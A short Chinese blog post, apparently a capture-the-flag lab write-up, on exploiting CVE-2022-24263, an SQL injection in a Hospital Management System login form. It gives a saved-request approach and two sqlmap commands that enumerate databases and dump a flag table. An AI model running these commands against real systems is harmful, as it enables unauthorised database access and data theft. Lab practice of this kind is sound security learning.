前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CVE-2022-24263

CVE-2022-24263

作者头像
cultureSun
发布2023-05-18 14:58:03
2140
发布2023-05-18 14:58:03
举报
文章被收录于专栏:cultureSun学安全cultureSun学安全

简介

是一个医院管理系统----Hospital Management System,存在sqli漏洞。

本人使用春秋云境免费靶场在线搭建。

详解

github找到了该漏洞的介绍。注入点在登录框。

  1. 输入账户密码登录,抓包
1683602856871.png
1683602856871.png
  1. 有三个登录框测试一下,三个都可以。将request保存为sqli.txt文件
2023-05-09T03:29:36.png
2023-05-09T03:29:36.png
  1. 使用sqlmap注入,命令如下
代码语言:javascript
复制
sqlmap -r sqli.txt --random-agent --risk=3 --level=3 -dbs 

Bash

  1. flag在ctf数据库的falg表中
代码语言:javascript
复制
sqlmap -r sqli.txt --random-agent --risk=3 --level=3 -D ctf -T flag --dump

Bash

Github点击here

结语

我加入了腾讯云自媒体分享计划,可以获取到腾讯云周边、技术书籍、线下沙龙、云服务器优惠等等。 我的博客即将同步至腾讯云开发者社区,邀请大家一同入驻:https://cloud.tencent.com/developer/support-plan?invite_code=1f93zvim5fqci

本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 简介
  • 详解
  • 结语
相关产品与服务
云开发 CloudBase
云开发(Tencent CloudBase,TCB)是腾讯云提供的云原生一体化开发环境和工具平台,为200万+企业和开发者提供高可用、自动弹性扩缩的后端云服务,可用于云端一体化开发多种端应用(小程序、公众号、Web 应用等),避免了应用开发过程中繁琐的服务器搭建及运维,开发者可以专注于业务逻辑的实现,开发门槛更低,效率更高。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档